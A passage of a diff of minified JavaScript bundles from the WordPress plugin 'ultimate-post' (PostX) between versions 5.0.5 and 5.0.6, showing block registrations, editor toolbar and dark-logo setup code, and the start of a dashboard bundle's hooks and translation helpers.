View","List"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},66026:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-list-4","title":"Post List #4","description":"Listing your posts with a big image on top and small images at the bottom.","category":"ultimate-post","keywords":["Post Listing","Listing","Article","List View","List"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},76463:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-module-1","title":"Post Module #1","description":"Display your big posts on the left and small posts on right.","category":"ultimate-post","keywords":["Post List","Post Grid","Post Module","Latest Post","Module"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},65994:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-module-2","title":"Post Module #2","description":"Listing your posts with big posts on the top.","category":"ultimate-post","keywords":["Post List","Post Grid","Post Module","Latest Post","Module"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},74384:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-slider-1","title":"Post Slider #1","description":"Dynamic post slider with lots of settings.","category":"ultimate-post","keywords":["Post Slider","Post Carousel","Slide","Slider","Feature"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},1106:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-slider-2","title":"Post Slider #2","description":"An advanced & highly customizable Post Slider","category":"ultimate-post","keywords":["Post Slider","Post Carousel","Slide","Slider","Feature"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post","usesContext":["post-grid-parent/postBlockClientId"]}')},29299:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/social-icons","title":"Social Icons","category":"ultimate-post","keywords":["Social","Icons","Social Media","Links"],"supports":{"align":["center","wide","full"]},"textdomain":"ultimate-post"}')},60134:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/social","title":"Social item","category":"ultimate-post","parent":["ultimate-post/social-icons"],"description":"Create & customize a Social icon.","keywords":["link","social"],"supports":{"reusable":false,"html":false},"textdomain":"ultimate-post"}')},74921:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/star-rating","title":"Star Ratings","category":"ultimate-post","description":"Show ratings and reviews on your website.","keywords":["star ratings","rating","rating star","review"],"textdomain":"ultimate-post","supports":{"align":["wide","full"],"reusable":true}}')},92857:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/table-of-content","title":"Table of Contents","category":"ultimate-post","keywords":["Table of Contents","TOC","Article","Post Listing","Navigation"],"supports":{"align":["center","wide","full"],"reusable":false},"textdomain":"ultimate-post"}')},55350:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/tabs","title":"Tabs","category":"ultimate-post","keywords":["tab","Tabs","Tab View","Container","tabs PostX"],"supports":{"html":false,"reusable":false,"align":["center","wide","full"]},"textdomain":"ultimate-post"}')},71573:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/tab-item","title":"Tab Item","category":"ultimate-post","parent":["ultimate-post/tabs"],"description":"Create & customize Tab Item","keywords":["tab","Tabs","Tab View","Container","Tabs PostX","tabs PostX"],"supports":{"reusable":false,"__experimentalMoveToolbar":false,"html":false},"textdomain":"ultimate-post"}')},34433:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/ultp-taxonomy","title":"Taxonomy","category":"ultimate-post","keywords":["Taxonomy","Category","Category List"],"supports":{},"textdomain":"ultimate-post"}')},52031:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/wrapper","title":"Wrapper","category":"ultimate-post","keywords":["Wrapper","Wrap","Column"],"supports":{"align":["center","wide","full"]},"description":"Wrapper block for Gutenberg.","textdomain":"ultimate-post"}')},6947:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/youtube-gallery","title":"Youtube Gallery","category":"ultimate-post","keywords":["youtube","gallery","video","playlist"],"textdomain":"ultimate-post","supports":{"align":["wide","full"],"reusable":true}}')},49681:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/advance-post-meta","title":"Advanced Post Meta","category":"postx-site-builder","description":"Display Advance Post Meta with the ultimate controls.","textdomain":"ultimate-post","keywords":["Advanced Post Meta","Post Meta","Meta"],"supports":{"align":["center","wide","full"],"reusable":false}}')},94772:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/archive-title","title":"Archive Title","category":"postx-site-builder","description":"Display archive titles and customize them as you need.","textdomain":"ultimate-post","keywords":["archive","dynamic title","title"],"supports":{"align":["center","wide","full"],"reusable":false}}')},23826:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/author-box","title":"Post Author Box","category":"postx-site-builder","description":"Display Post Author details and customize them as you need.","textdomain":"ultimate-post","keywords":["Post Author Box","Author","Blog Post Author"],"supports":{"align":["center","wide","full"],"reusable":false}}')},81837:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/next-previous","title":"Post Next Previous","category":"postx-site-builder","description":"Display Previous and Next Post links with thumbnails.","textdomain":"ultimate-post","keywords":["Next Previous","Post Navigation","Navigation","Next","Previous"],"supports":{"align":["center","wide","full"],"reusable":false}}')},45536:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-author-meta","title":"Post Author Meta","category":"postx-site-builder","description":"Display Post Author Meta with the ultimate controls.","textdomain":"ultimate-post","keywords":["Post Author Meta","Author Meta","Post Author"],"supports":{"align":["center","wide","full"],"reusable":false}}')},88211:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-breadcrumb","title":"Post Breadcrumb","category":"postx-site-builder","description":"Display Breadcrumb to let visitors see navigational links.","textdomain":"ultimate-post","keywords":["breadcrumb","Post breadcrumb","breadcrumbs"],"supports":{"align":["center","wide","full"],"reusable":false}}')},72927:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-category","title":"Post Category","category":"postx-site-builder","description":"Display Post Categories and style them as you need.","textdomain":"ultimate-post","keywords":["Category","Taxonomy","Categories"],"supports":{"align":["center","wide","full"],"reusable":false}}')},30577:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-comment-count","title":"Post Comment Count","category":"postx-site-builder","description":"Display Post Comment count and customize it as you need.","textdomain":"ultimate-post","keywords":["Post Comment Count","Post Comment","Comment Count"],"supports":{"align":["center","wide","full"],"reusable":false}}')},50540:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-comments","title":"Post Comments","category":"postx-site-builder","description":"Display the Post Comment section and customize it as you need.","textdomain":"ultimate-post","keywords":["Comments","Comment Form"],"supports":{"align":["center","wide","full"],"reusable":false}}')},59943:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-content","title":"Post Content","category":"postx-site-builder","description":"Display Post Content in a customized and organized way.","textdomain":"ultimate-post","keywords":["Content","Desctiption","Post Content"],"supports":{"align":["center","wide","full"],"reusable":false}}')},39180:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-date-meta","title":"Post Date Meta","category":"postx-site-builder","description":"Display Post Publish/Modified Date and customize it as you need.","textdomain":"ultimate-post","keywords":["Date","Modify","Modified","Date Meta","Post Date"],"supports":{"align":["center","wide","full"],"reusable":false}}')},34776:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-excerpt","title":"Post Excerpt","category":"postx-site-builder","description":"Display Post Excerpt if required and customize as you need.","textdomain":"ultimate-post","keywords":["excerpts","post excerpt"],"supports":{"align":["center","wide","full"],"reusable":false}}')},96283:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-featured-image","title":"Post Featured Image/Video","category":"postx-site-builder","description":"Display the Featured Image/Video and adjust the visual look.","textdomain":"ultimate-post","keywords":["Image","Video","Featured Image","Featured Video","Post Featured Video","Post Featured Image"],"supports":{"align":["center","wide","full"],"reusable":false}}')},46693:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-reading-time","title":"Post Reading Time","category":"postx-site-builder","description":"Display Expecting Reading Time and customize it as you need.","textdomain":"ultimate-post","keywords":["Post Reading Time","Post Reading","Reading Time"],"supports":{"align":["center","wide","full"],"reusable":false}}')},14980:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-social-share","title":"Post Social Share","category":"postx-site-builder","description":"Display Social Share Buttons to let visitors share posts to their social profiles.","textdomain":"ultimate-post","keywords":["Post Share","Social Share","Social Media","Share"],"supports":{"align":["center","wide","full"],"reusable":false}}')},75832:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-tag","title":"Post Tag","category":"postx-site-builder","description":"Display Post Tags and style them as you need.","textdomain":"ultimate-post","keywords":["Tag","Post Tags","Tags"],"supports":{"align":["center","wide","full"],"reusable":false}}')},96787:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-title","title":"Post Title","category":"postx-site-builder","description":"Display the Post Title and customize it as you need.","textdomain":"ultimate-post","keywords":["heading","title","post title"],"supports":{"align":["center","wide","full"],"reusable":false}}')},15648:e=>{"use strict";e.exports=JSON.parse('{"$schema":"https://schemas.wp.org/trunk/block.json","apiVersion":3,"name":"ultimate-post/post-view-count","title":"Post View Count","category":"postx-site-builder","description":"Display the post view count and customize it as you need.","keywords":["view","Post View Count","Post View","View","statistics"],"textdomain":"ultimate-post","supports":{"html":false,"align":true}}')}},t={};function l(o){var a=t[o];if(void 0!==a)return a.exports;var i=t[o]={id:o,exports:{}};return e[o](i,i.exports,l),i.exports}l.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return l.d(t,{a:t}),t},l.d=(e,t)=>{for(var o in t)l.o(t,o)&&!l.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:t[o]})},l.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window)return window}}(),l.o=(e,t)=>Object.prototype.hasOwnProperty.call(e,t),l.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},l.nc=void 0,(()=>{"use strict";var e=l(87462),t=l(67294),o=l(85701),a=(l(9544),l(20223),l(71184),l(42177),l(30365),l(48844),l(99038),l(92756),l(1845),l(5930),l(32633),l(5715),l(24484),l(67879),l(47127),l(31693),l(96405),l(83674),l(82177),l(37549),l(72528),l(92038),l(18866),l(43053),l(82738),l(15816),l(24072),l(5109),l(21123),l(77794),l(58910),l(32294),l(84764),l(3609),l(28578),l(80400),l(71807),l(28871),l(36653),l(35391),l(74955),l(31145),l(37216),l(7004),l(85562),l(96519),l(35946),l(68944),l(1565),l(53056),l(41544),l(23061),l(75574),l(41458),l(1818),l(29044),l(11182),l(13427),l(68425),l(86303),l(28913),l(64255),l(88111),l(81213),l(31366),l(41977),l(5207),l(85556),l(69735),l(25364)),i=l(3780),n=l(60405),r=l(70674),s=l(34285);const{__}=wp.i18n,{domReady:p}=wp,{updateCategory:c,unregisterBlockType:u}=wp.blocks,{subscribe:d,dispatch:m}=wp.data,{render:g}=wp.element,{registerPlugin:y}=wp.plugins,{addFilter:b}=wp.hooks,{InspectorControls:v}=wp.blockEditor;window.ultpDevice="lg",window.bindCssPostX=!1;let h=!1;c("ultimate-post",{icon:(0,t.createElement)("img",{className:"ultp-insert-box-popup",style:{height:"30px",marginTop:"-1px"},src:ultp_data.url+"assets/img/logo-sm.svg",alt:"PostX"})}),jQuery(document).on("click",".editor-entities-saved-states__save-button",(function(){h||(h=!0,(0,s.R)({handleBindCss:!0,preview:!1}),setTimeout((()=>{h=!1}),1e3))}));const f=()=>{setTimeout((()=>{jQuery(".edit-widgets-header__actions .components-button").click((()=>{const e=[];!1===window.bindCssPostX&&(jQuery(".block-editor-block-list__block").each((function(){jQuery(this).data("type").includes("ultimate-post/")&&e.push({id:jQuery(this).data("block"),name:jQuery(this).data("type")})})),e.length>0&&(0,s.V)(e))}))}),0)};p((function(){document.querySelector(".widgets-php")?f():document.querySelector(".block-editor-page")&&(d((()=>{const{isSavingPost:e,isAutosavingPost:t,isPreviewingPost:l,isEditedPostSaveable:o}=wp.data.select("core/editor");null!=wp.data.select("core/editor")&&(o()&&!l()&&(h=!1,window.bindCssPostX=!1),t()?l()&&0==window.bindCssPostX&&(window.bindCssPostX=!0,(0,s.R)({handleBindCss:!0,preview:!0})):e()&&0==window.bindCssPostX&&(window.bindCssPostX=!0,h=!0,(0,s.R)({handleBindCss:!1,preview:!1}))),jQuery('[aria-controls="ultp-postx-settings:postx-settings"] span[arial-label="Go Back"]').css("display","none")})),"yes"!=ultp_data.hide_import_btn&&(()=>{const e=d((()=>{let l;if(wp.data.select("core/edit-site")?(l=document.querySelector(".editor-header__toolbar"),l||(l=window.document.querySelector(".edit-site-header-edit-mode__center"))):(l=document.querySelector(".editor-header__toolbar"),l||(l=document.querySelector(".edit-post-header__toolbar")),l||(l=document.querySelector(".edit-post-header-toolbar"))),!l)return;const i=`<button id="UltpChatGPTButton" class="ultp-popup-button" aria-label="ChatGPT"><img class="ultp-popup-bar-image" src="${ultp_data.url+"assets/img/addons/ChatGPT.svg"}">${__("ChatGPT","ultimate-post")}</button>`,n=document.createElement("div");n.className="toolbar-insert-layout";const r=`${"true"==ultp_data.settings.ultp_chatgpt?i:""}<button id="UltpInsertButton" class="ultp-popup-button" aria-label="Insert Layout">\n        <img class="ultp-popup-bar-image" src="${ultp_data.url+"assets/img/logo-sm.svg"}">\n                        ${["singular","archive","header","footer","404"].includes(ultp_data.archive)?__("Builder Library","ultimate-post"):__("Template Kits","ultimate-post")}\n                    </button>`;n.innerHTML=r,l.appendChild(n),document.getElementById("UltpInsertButton")?.addEventListener("click",(function(){const e=document.createElement("div");e.className="ultp-builder-modal ultp-blocks-layouts",document.body.appendChild(e),g((0,t.createElement)(o.Z,{isShow:!0}),e),document.body.classList.add("ultp-popup-open")})),document.getElementById("UltpChatGPTButton")?.addEventListener("click",(function(){const e=document.createElement("div");e.className="ultp-builder-modal ultp-blocks-layouts",document.body.appendChild(e),g((0,t.createElement)(a.Z,{isShow:!0,fromEditPostToolbar:!0}),e),document.body.classList.add("ultp-popup-open")})),e()}))})());const e={heading:"heading",image:"image",news_ticker:"news-ticker",post_grid_1:"post-grid-1",post_grid_2:"post-grid-2",post_grid_3:"post-grid-3",post_grid_4:"post-grid-4",post_grid_5:"post-grid-5",post_grid_6:"post-grid-6",post_grid_7:"post-grid-7",post_list_1:"post-list-1",post_list_2:"post-list-2",post_list_3:"post-list-3",post_list_4:"post-list-4",post_module_1:"post-module-1",post_module_2:"post-module-2",post_slider_1:"post-slider-1",post_slider_2:"post-slider-2",taxonomy:"ultp-taxonomy",wrapper:"wrapper",advanced_list:"advanced-list",button_group:"button-group",row:"row",advanced_search:"advanced-search",dark_light:"dark-light",social_icons:"social-icons",menu:"menu",star_ratings:"star-rating",accordion:"accordion",tabs:"tabs",gallery:"gallery",youtube_gallery:"youtube-gallery"};Object.keys(e).forEach((t=>{ultp_data.settings?.hasOwnProperty(t)&&"yes"!=ultp_data.settings[t]&&u("ultimate-post/"+e[t])}));const l={builder_advance_post_meta:"advance-post-meta",builder_archive_title:"archive-title",builder_author_box:"author-box",builder_post_next_previous:"next-previous",builder_post_author_meta:"post-author-meta",builder_post_breadcrumb:"post-breadcrumb",builder_post_category:"post-category",builder_post_comment_count:"post-comment-count",builder_post_comments:"post-comments",builder_post_content:"post-content",builder_post_date_meta:"post-date-meta",builder_post_excerpt:"post-excerpt",builder_post_featured_image:"post-featured-image",builder_post_reading_time:"post-reading-time",builder_post_social_share:"post-social-share",builder_post_tag:"post-tag",builder_post_title:"post-title",builder_post_view_count:"post-view-count"};"ultp_builder"==ultp_data.post_type?Object.keys(l).forEach((e=>{ultp_data.settings?.hasOwnProperty(e)&&"yes"!=ultp_data.settings[e]&&u("ultimate-post/"+l[e])})):Object.keys(l).forEach((e=>{u("ultimate-post/"+l[e])})),ultp_data.settings?.hasOwnProperty("ultp_table_of_content")&&"true"!=ultp_data.settings.ultp_table_of_content&&u("ultimate-post/table-of-content")})),b("blocks.registerBlockType","ultimate-post/ultp-site-logo-attributes",(function(e){if("core/site-logo"==e.name){const t={ultpEnableDarkLogo:{type:"boolean",default:!1},ultpdarkLogo:{type:"object"}};e.attributes={...e.attributes,...t}}return e})),b("editor.BlockEdit","core/site-logo",(function(l){const o=[];return function(a){const{attributes:{ultpEnableDarkLogo:r,ultpdarkLogo:s,className:p},setAttributes:c}=a;if("core/site-logo"==a.name){const e=o.indexOf(a.clientId);r&&e<0?o.push(a.clientId):e>-1&&o.splice(e,1)}return[(0,t.createElement)(l,(0,e.Z)({key:a?.clientId},a)),a.isSelected&&"core/site-logo"==a.name&&(0,t.createElement)(v,null,(0,t.createElement)("div",{className:"ultp-dark-logo-control"},(0,t.createElement)(n.Z,{label:__("Enable Dark Mode Logo(PostX)","ultimate-post"),value:r,onChange:e=>{a.setAttributes({ultpEnableDarkLogo:e,className:e?(p||"")+" ultp-dark-logo":p?.replaceAll("ultp-dark-logo","")})}}),r&&(0,t.createElement)(i.Z,{label:__("Upload Dark Mode Image","ultimate-post"),multiple:!1,type:["image"],panel:!0,value:null!=s?s:{url:ultp_data.dark_logo},onChange:e=>{var t;t=e,wp.apiFetch({path:"/ultp/v2/init_site_dark_logo",method:"POST",data:{wpnonce:ultp_data.security,logo:t}}).then((e=>{})),c({ultpdarkLogo:t}),o.length&&m&&o.forEach((e=>{m("core/block-editor").updateBlockAttributes(e,{ultpdarkLogo:t})}))}})))]}}),0),y("ultp-postx-settings",{render:()=>(0,t.createElement)(r.Z,null)})})()})();
\ No newline at end of file
diff -ru /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/ultp_dashboard_min.js /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/ultp_dashboard_min.js
--- /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.5/assets/js/ultp_dashboard_min.js	2025-12-22 05:22:42.000000000 +0000
+++ /home/deploy/wp-safety.org/data/plugin-versions/ultimate-post/5.0.6/assets/js/ultp_dashboard_min.js	2026-02-02 04:04:06.000000000 +0000
@@ -1,2 +1,2 @@
 /*! For license information please see ultp_dashboard_min.js.LICENSE.txt */
-(()=>{var e={1974:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(2141),r=n(192);function o(e){var t=(0,a.Z)(e);return function(e){return(0,r.Z)(t,e)}}},192:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a={"!":function(e){return!e},"*":function(e,t){return e*t},"/":function(e,t){return e/t},"%":function(e,t){return e%t},"+":function(e,t){return e+t},"-":function(e,t){return e-t},"<":function(e,t){return e<t},"<=":function(e,t){return e<=t},">":function(e,t){return e>t},">=":function(e,t){return e>=t},"==":function(e,t){return e===t},"!=":function(e,t){return e!==t},"&&":function(e,t){return e&&t},"||":function(e,t){return e||t},"?:":function(e,t,n){if(e)throw t;return n}};function r(e,t){var n,r,o,i,l,s,p=[];for(n=0;n<e.length;n++){if(l=e[n],i=a[l]){for(r=i.length,o=Array(r);r--;)o[r]=p.pop();try{s=i.apply(null,o)}catch(e){return e}}else s=t.hasOwnProperty(l)?t[l]:+l;p.push(s)}return p[0]}},7680:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(1974);function r(e){var t=(0,a.Z)(e);return function(e){return+t({n:e})}}},2141:(e,t,n)=>{"use strict";var a,r,o,i;function l(e){for(var t,n,l,s,p=[],c=[];t=e.match(i);){for(n=t[0],(l=e.substr(0,t.index).trim())&&p.push(l);s=c.pop();){if(o[n]){if(o[n][0]===s){n=o[n][1]||n;break}}else if(r.indexOf(s)>=0||a[s]<a[n]){c.push(s);break}p.push(s)}o[n]||c.push(n),e=e.substr(t.index+n.length)}return(e=e.trim())&&p.push(e),p.concat(c.reverse())}n.d(t,{Z:()=>l}),a={"(":9,"!":8,"*":7,"/":7,"%":7,"+":6,"-":6,"<":5,"<=":5,">":5,">=":5,"==":4,"!=":4,"&&":3,"||":2,"?":1,"?:":1},r=["(","?"],o={")":["("],":":["?","?:"]},i=/<=|>=|==|!=|&&|\|\||\?:|\(|!|\*|\/|%|\+|-|<|>|\?|\)|:/},8247:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(4103),r=n(1755);const o=function(e,t){return function(n,o,i,l=10){const s=e[t];if(!(0,r.Z)(n))return;if(!(0,a.Z)(o))return;if("function"!=typeof i)return void console.error("The hook callback must be a function.");if("number"!=typeof l)return void console.error("If specified, the hook priority must be a number.");const p={callback:i,priority:l,namespace:o};if(s[n]){const e=s[n].handlers;let t;for(t=e.length;t>0&&!(l>=e[t-1].priority);t--);t===e.length?e[t]=p:e.splice(t,0,p),s.__current.forEach((e=>{e.name===n&&e.currentIndex>=t&&e.currentIndex++}))}else s[n]={handlers:[p],runs:0};"hookAdded"!==n&&e.doAction("hookAdded",n,o,i,l)}}},9992:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(){var n;const a=e[t];return null!==(n=a.__current[a.__current.length-1]?.name)&&void 0!==n?n:null}}},3972:(e,t,n)=>{"use strict";n.d(t,{Z:()=>r});var a=n(1755);const r=function(e,t){return function(n){const r=e[t];if((0,a.Z)(n))return r[n]&&r[n].runs?r[n].runs:0}}},1786:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(n){const a=e[t];return void 0===n?void 0!==a.__current[0]:!!a.__current[0]&&n===a.__current[0].name}}},8642:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t){return function(n,a){const r=e[t];return void 0!==a?n in r&&r[n].handlers.some((e=>e.namespace===a)):n in r}}},1019:(e,t,n)=>{"use strict";n.d(t,{Z:()=>d});var a=n(8247),r=n(9099),o=n(8642),i=n(6424),l=n(9992),s=n(1786),p=n(3972);class c{constructor(){this.actions=Object.create(null),this.actions.__current=[],this.filters=Object.create(null),this.filters.__current=[],this.addAction=(0,a.Z)(this,"actions"),this.addFilter=(0,a.Z)(this,"filters"),this.removeAction=(0,r.Z)(this,"actions"),this.removeFilter=(0,r.Z)(this,"filters"),this.hasAction=(0,o.Z)(this,"actions"),this.hasFilter=(0,o.Z)(this,"filters"),this.removeAllActions=(0,r.Z)(this,"actions",!0),this.removeAllFilters=(0,r.Z)(this,"filters",!0),this.doAction=(0,i.Z)(this,"actions"),this.applyFilters=(0,i.Z)(this,"filters",!0),this.currentAction=(0,l.Z)(this,"actions"),this.currentFilter=(0,l.Z)(this,"filters"),this.doingAction=(0,s.Z)(this,"actions"),this.doingFilter=(0,s.Z)(this,"filters"),this.didAction=(0,p.Z)(this,"actions"),this.didFilter=(0,p.Z)(this,"filters")}}const d=function(){return new c}},9099:(e,t,n)=>{"use strict";n.d(t,{Z:()=>o});var a=n(4103),r=n(1755);const o=function(e,t,n=!1){return function(o,i){const l=e[t];if(!(0,r.Z)(o))return;if(!n&&!(0,a.Z)(i))return;if(!l[o])return 0;let s=0;if(n)s=l[o].handlers.length,l[o]={runs:l[o].runs,handlers:[]};else{const e=l[o].handlers;for(let t=e.length-1;t>=0;t--)e[t].namespace===i&&(e.splice(t,1),s++,l.__current.forEach((e=>{e.name===o&&e.currentIndex>=t&&e.currentIndex--})))}return"hookRemoved"!==o&&e.doAction("hookRemoved",o,i),s}}},6424:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e,t,n=!1){return function(a,...r){const o=e[t];o[a]||(o[a]={handlers:[],runs:0}),o[a].runs++;const i=o[a].handlers;if(!i||!i.length)return n?r[0]:void 0;const l={name:a,currentIndex:0};for(o.__current.push(l);l.currentIndex<i.length;){const e=i[l.currentIndex].callback.apply(null,r);n&&(r[0]=e),l.currentIndex++}return o.__current.pop(),n?r[0]:void 0}}},1957:(e,t,n)=>{"use strict";n.d(t,{JQ:()=>a});const a=(0,n(1019).Z)(),{addAction:r,addFilter:o,removeAction:i,removeFilter:l,hasAction:s,hasFilter:p,removeAllActions:c,removeAllFilters:d,doAction:u,applyFilters:m,currentAction:f,currentFilter:h,doingAction:g,doingFilter:v,didAction:_,didFilter:w,actions:b,filters:x}=a},1755:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e){return"string"!=typeof e||""===e?(console.error("The hook name must be a non-empty string."),!1):/^__/.test(e)?(console.error("The hook name cannot begin with `__`."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.-]*$/.test(e)||(console.error("The hook name can only contain numbers, letters, dashes, periods and underscores."),!1)}},4103:(e,t,n)=>{"use strict";n.d(t,{Z:()=>a});const a=function(e){return"string"!=typeof e||""===e?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(e)||(console.error("The namespace can only contain numbers, letters, dashes, periods, underscores and slashes."),!1)}},6016:(e,t,n)=>{"use strict";n.d(t,{o:()=>i});var a=n(5022);const r={plural_forms:e=>1===e?0:1},o=/^i18n\.(n?gettext|has_translation)(_|$)/,i=(e,t,n)=>{const i=new a.Z({}),l=new Set,s=()=>{l.forEach((e=>e()))},p=(e,t="default")=>{i.data[t]={...i.data[t],...e},i.data[t][""]={...r,...i.data[t]?.[""]},delete i.pluralForms[t]},c=(e,t)=>{p(e,t),s()},d=(e="default",t,n,a,r)=>(i.data[e]||p(void 0,e),i.dcnpgettext(e,t,n,a,r)),u=(e="default")=>e,_x=(e,t,a)=>{let r=d(a,t,e);return n?(r=n.applyFilters("i18n.gettext_with_context",r,e,t,a),n.applyFilters("i18n.gettext_with_context_"+u(a),r,e,t,a)):r};if(e&&c(e,t),n){const e=e=>{o.test(e)&&s()};n.addAction("hookAdded","core/i18n",e),n.addAction("hookRemoved","core/i18n",e)}return{getLocaleData:(e="default")=>i.data[e],setLocaleData:c,addLocaleData:(e,t="default")=>{i.data[t]={...i.data[t],...e,"":{...r,...i.data[t]?.[""],...e?.[""]}},delete i.pluralForms[t],s()},resetLocaleData:(e,t)=>{i.data={},i.pluralForms={},c(e,t)},subscribe:e=>(l.add(e),()=>l.delete(e)),__:(e,t)=>{let a=d(t,void 0,e);return n?(a=n.applyFilters("i18n.gettext",a,e,t),n.applyFilters("i18n.gettext_"+u(t),a,e,t)):a},_x,_n:(e,t,a,r)=>{let o=d(r,void 0,e,t,a);return n?(o=n.applyFilters("i18n.ngettext",o,e,t,a,r),n.applyFilters("i18n.ngettext_"+u(r),o,e,t,a,r)):o},_nx:(e,t,a,r,o)=>{let i=d(o,r,e,t,a);return n?(i=n.applyFilters("i18n.ngettext_with_context",i,e,t,a,r,o),n.applyFilters("i18n.ngettext_with_context_"+u(o),i,e,t,a,r,o)):i},isRTL:()=>"rtl"===_x("ltr","text direction"),hasTranslation:(e,t,a)=>{const r=t?t+""+e:e;let o=!!i.data?.[null!=a?a:"default"]?.[r];return n&&(o=n.applyFilters("i18n.has_translation",o,e,t,a),o=n.applyFilters("i18n.has_translation_"+u(a),o,e,t,a)),o}}}},7836:(e,t,n)=>{"use strict";n.d(t,{__:()=>__});var a=n(6016),r=n(1957);const o=(0,a.o)(void 0,void 0,r.JQ);o.getLocaleData.bind(o),o.setLocaleData.bind(o),o.resetLocaleData.bind(o),o.subscribe.bind(o);const __=o.__.bind(o);o._x.bind(o),o._n.bind(o),o._nx.bind(o),o.isRTL.bind(o),o.hasTranslation.bind(o)},2304:(e,t,n)=>{"use strict";n.d(t,{__:()=>a.__}),n(5917),n(6016);var 